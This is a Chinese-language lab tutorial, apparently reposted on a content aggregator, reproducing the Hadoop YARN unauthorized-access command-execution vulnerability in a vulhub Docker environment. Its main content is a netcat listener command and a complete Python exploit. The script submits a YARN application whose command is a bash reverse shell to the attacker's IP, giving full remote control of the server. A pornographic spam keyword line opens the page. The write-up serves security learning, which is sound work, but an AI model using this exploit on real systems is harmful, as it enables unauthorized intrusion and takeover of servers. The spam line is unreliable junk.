国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

數(shù)據(jù)庫安全:Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞.

這篇具有很好參考價值的文章主要介紹了數(shù)據(jù)庫安全:Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞.。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

數(shù)據(jù)庫安全:Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞.

Hadoop 未授權(quán)訪問主要是因為 Hadoop YARN 資源管理系統(tǒng)配置不當(dāng),導(dǎo)致可以未經(jīng)授權(quán)進行訪問,從而被攻擊者惡意利用。攻擊者無需認(rèn)證即可通過 RESTAPI 部署任務(wù)來執(zhí)行任意指令,最終完全控制服務(wù)器。


目錄:

數(shù)據(jù)庫安全:Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞.

Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞:

開啟?vulhub 靶場環(huán)境:

Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞測試:


Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞:

開啟?vulhub 靶場環(huán)境:

?第一步:切換到?vulhub 目錄下

cd vulhub

hadoop 漏洞,# 服務(wù)攻防 領(lǐng)域.,滲透測試 領(lǐng)域.,web安全,安全,網(wǎng)絡(luò)安全


第二步:切換到 hadoop 目錄下

cd hadoop

hadoop 漏洞,# 服務(wù)攻防 領(lǐng)域.,滲透測試 領(lǐng)域.,web安全,安全,網(wǎng)絡(luò)安全


第三步:切換到?unauthorized-yarn?漏洞目錄下.

hadoop 漏洞,# 服務(wù)攻防 領(lǐng)域.,滲透測試 領(lǐng)域.,web安全,安全,網(wǎng)絡(luò)安全


第四步:開啟 漏洞 服務(wù).

docker-compose up -d

hadoop 漏洞,# 服務(wù)攻防 領(lǐng)域.,滲透測試 領(lǐng)域.,web安全,安全,網(wǎng)絡(luò)安全


第五步:訪問? http:// (靶場 IP 地址):8088

hadoop 漏洞,# 服務(wù)攻防 領(lǐng)域.,滲透測試 領(lǐng)域.,web安全,安全,網(wǎng)絡(luò)安全


? ?

Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞測試:

第一步:訪問 /cluster/apps 頁面【如果 該頁面存在的話,說明存在未授權(quán)訪問漏洞】

http://192.168.0.106:8088/cluster/apps

hadoop 漏洞,# 服務(wù)攻防 領(lǐng)域.,滲透測試 領(lǐng)域.,web安全,安全,網(wǎng)絡(luò)安全


第二步:在 攻擊機(kali)設(shè)置監(jiān)聽.

nc -nvlp 8888

// 設(shè)置 監(jiān)聽 端口為8888

hadoop 漏洞,# 服務(wù)攻防 領(lǐng)域.,滲透測試 領(lǐng)域.,web安全,安全,網(wǎng)絡(luò)安全


第三步:編寫 Python 執(zhí)行代碼.

import requests

def shell(url,vps_ip,port):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
    }
    response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)
    id = response.json()["application-id"]
    data = {
        'application-id': id,
        'application-name': 'getshell',
        'am-container-spec': {
            'commands': {
                'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)
            },
        },
        'application-type': 'YARN'}
    exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)
    print("[+] 執(zhí)行完成!")


if __name__ == '__main__':
    url = input("目標(biāo)的URL:")
    vps_ip = input("監(jiān)聽的主機IP地址(kali):")
    port = input("監(jiān)聽的主機端口(kali):")
    shell(url,vps_ip,port)

執(zhí)行代碼:

hadoop 漏洞,# 服務(wù)攻防 領(lǐng)域.,滲透測試 領(lǐng)域.,web安全,安全,網(wǎng)絡(luò)安全


第四步:返回 監(jiān)聽的主機查看結(jié)果,發(fā)現(xiàn)已經(jīng)成功.

hadoop 漏洞,# 服務(wù)攻防 領(lǐng)域.,滲透測試 領(lǐng)域.,web安全,安全,網(wǎng)絡(luò)安全


? ??

? ? ?

? ? ?

參考文章:Hadoop 漏洞復(fù)現(xiàn)_hadoop命令執(zhí)行漏洞-CSDN博客

學(xué)習(xí)鏈接:第55天:服務(wù)攻防-數(shù)據(jù)庫安全_Redis_Hadoop_Mysql_未授權(quán)訪問_RCE_嗶哩嗶哩_bilibili文章來源地址http://www.zghlxwxcb.cn/news/detail-751660.html

到了這里,關(guān)于數(shù)據(jù)庫安全:Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞.的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 【漏洞復(fù)現(xiàn)】StarRocks MPP數(shù)據(jù)庫未授權(quán)訪問漏洞

    【漏洞復(fù)現(xiàn)】StarRocks MPP數(shù)據(jù)庫未授權(quán)訪問漏洞

    ????????StarRocks 是一個MPP數(shù)據(jù)庫,具備水平在線擴縮容,金融級高可用,兼容 MySQL 5.7 協(xié)議和 MySQL 生態(tài),提供全面向量化引擎與多種數(shù)據(jù)源聯(lián)邦查詢等重要特性。StarRocks 致力于在全場景 OLAP 業(yè)務(wù)上為用戶提供統(tǒng)一的解決方案,適用于對性能,實時性,并發(fā)能力和靈活性有

    2024年01月17日
    瀏覽(84)
  • 數(shù)據(jù)庫安全控制——授權(quán)及回收權(quán)限

    數(shù)據(jù)庫安全控制——授權(quán)及回收權(quán)限

    任務(wù)描述 本關(guān)任務(wù):系統(tǒng)用戶 root 授權(quán) user1 用戶創(chuàng)建數(shù)據(jù)庫 teachingdb2 及其所有對象的權(quán)限 相關(guān)知識 為了完成本關(guān)任務(wù),你需要掌握 MySQL 的權(quán)限管理。 MySql系統(tǒng)庫中的權(quán)限表 MySql 系統(tǒng)庫中的權(quán)限表: user:最重要的權(quán)限表,存儲允許連接到服務(wù)器的賬號。 db:存儲用戶對某

    2024年02月05日
    瀏覽(21)
  • Docker中部署ElasticSearch 和Kibana,用腳本實現(xiàn)對數(shù)據(jù)庫資源的未授權(quán)訪問

    Docker中部署ElasticSearch 和Kibana,用腳本實現(xiàn)對數(shù)據(jù)庫資源的未授權(quán)訪問

    圖未保存,不過文章當(dāng)中的某一步驟可能會幫助到您,那么:感恩! 1、docker中拉取鏡像 2、熟悉目錄 3、啟動,訪問9200 4、訪問測試 1、下載(同樣使用docker環(huán)境) 2、啟動 3、連接測試easticsearch發(fā)現(xiàn)失敗,是前后端分離開發(fā)存在跨域問題,需要在服務(wù)端做CORS的配置 (1)進入

    2024年02月04日
    瀏覽(27)
  • Jupyter Notebook 未授權(quán)訪問遠(yuǎn)程命令執(zhí)行漏洞

    Jupyter Notebook 未授權(quán)訪問遠(yuǎn)程命令執(zhí)行漏洞

    Jupyter是一個開源的交互式計算環(huán)境,它支持多種編程語言,包括Python、R、Julia等。Jupyter的名稱來源于三種編程語言的縮寫:Ju(lia)、Py(thon)和R。 Jupyter的主要特點是它以筆記本(Notebook)的形式組織代碼、文本和多媒體內(nèi)容。筆記本可以包含代碼、注釋、圖表、公式和可運行的

    2024年02月14日
    瀏覽(19)
  • 基于物理安全的數(shù)據(jù)庫訪問控制:確保數(shù)據(jù)安全性

    作者:禪與計算機程序設(shè)計藝術(shù) 引言 1.1. 背景介紹 隨著大數(shù)據(jù)時代的到來,各類組織機構(gòu)和企業(yè)紛紛開始關(guān)注數(shù)據(jù)安全和隱私保護。在數(shù)據(jù)處理和存儲過程中,確保數(shù)據(jù)的物理安全和邏輯安全至關(guān)重要。數(shù)據(jù)庫訪問控制作為保障數(shù)據(jù)安全的一項基礎(chǔ)工作,也應(yīng)受到足夠的重

    2024年02月12日
    瀏覽(28)
  • PostgreSQL數(shù)據(jù)庫命令行執(zhí)行SQL腳本的三種方式

    PostgreSQL數(shù)據(jù)庫命令行執(zhí)行SQL腳本的三種方式

    生成環(huán)境中,出于安全性等原因,往往不提供數(shù)據(jù)庫連接工具,所以對數(shù)據(jù)庫的更新和升級就得通過命令行來實現(xiàn)。本文總結(jié)了三種命令行執(zhí)行sql腳本的方式。 命令格式: psql [option…] [dbname] [username] 常用參數(shù)介紹: -h:指定IP地址或主機名。 -p:指定端口,默認(rèn)為5432。 -U:

    2024年02月11日
    瀏覽(26)
  • Springboot使用ProcessBuilder創(chuàng)建系統(tǒng)進程執(zhí)行shell命令備份數(shù)據(jù)庫

    Springboot使用ProcessBuilder創(chuàng)建系統(tǒng)進程執(zhí)行shell命令備份數(shù)據(jù)庫

    Springboot執(zhí)行shell命令備份數(shù)據(jù)庫。 主要就是使用ProcessBuilder創(chuàng)建系統(tǒng)進程,執(zhí)行終端命令。

    2024年02月07日
    瀏覽(51)
  • SpringBoot 數(shù)據(jù)庫高效的數(shù)據(jù)訪問及安全解決方案

    作者:禪與計算機程序設(shè)計藝術(shù) 隨著互聯(lián)網(wǎng)的飛速發(fā)展,網(wǎng)站流量越來越多,用戶數(shù)據(jù)也越來越豐富,如何有效地存儲、處理和檢索數(shù)據(jù)成為了一個新的技術(shù)難題。 Spring Boot 是 Spring 框架的一個輕量級開源框架,其在 JavaEE(Java Platform, Enterprise Edition)開發(fā)中扮演了重要角色

    2024年02月10日
    瀏覽(19)
  • Sangfor華東天勇戰(zhàn)隊:h2數(shù)據(jù)庫console命令執(zhí)行( CVE-2021-42392 漏洞)

    Sangfor華東天勇戰(zhàn)隊:h2數(shù)據(jù)庫console命令執(zhí)行( CVE-2021-42392 漏洞)

    1.1.100 = H2 Console = 2.0.204 此處復(fù)現(xiàn)版本1.4.197 啟動項目如下 在Driver Class中輸入javax.naming.InitialContext 在JDBCURL中輸入jndi注入惡意鏈接 生成鏈接命令: 因為項目環(huán)境是jdk1.7,因此我們用1.7的jndi,其他版本均不生效 通過漏洞公布,可以看到是在org.h2.util.JdbcUtils.getConnection的javax.na

    2024年02月11日
    瀏覽(29)
  • Python數(shù)據(jù)權(quán)限的管理通常涉及到幾個關(guān)鍵組件:身份驗證,、授權(quán)和訪問控制。這通常是通過使用數(shù)據(jù)庫、ORM(對象關(guān)系映射)框架、API框架和中間件

    在Python中,數(shù)據(jù)權(quán)限的管理通常涉及到幾個關(guān)鍵組件:身份驗證,、授權(quán)和訪問控制。這通常是通過使用數(shù)據(jù)庫、ORM(對象關(guān)系映射)框架、API框架和中間件等技術(shù)來實現(xiàn)的。以下是一些建議的步驟和工具,用于在Python項目中實施數(shù)據(jù)權(quán)限管理: 用戶身份驗證: 使用如Djan

    2024年04月26日
    瀏覽(28)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包